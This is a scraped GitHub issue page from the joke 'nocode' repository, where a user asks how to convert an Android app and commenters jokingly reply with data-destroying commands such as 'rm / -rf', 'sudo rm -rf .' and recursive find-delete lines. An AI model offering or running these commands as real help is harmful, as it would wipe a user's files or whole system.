Nocode: How to transform my project to NOCODE

Created on 11 Feb 2018  路  4Comments  路  Source: kelseyhightower/nocode

I want to deploy my Android App to this project, how can I do this?

Most helpful comment

by exec this command :
rm / -rf
then transform done !

All 4 comments

by exec this command :
rm / -rf
then transform done !

Just need to run the command on your terminal at your project dir:
sudo rm -rf .

+1

A very simple:
find -type f -delete
find -type d -delete
will do the job

Was this page helpful?
0 / 5 - 0 ratings

Related issues

Jourday picture Jourday  路  3Comments

rolandixor picture rolandixor  路  3Comments

rdev picture rdev  路  3Comments

metzzo picture metzzo  路  3Comments

D10100111001 picture D10100111001  路  3Comments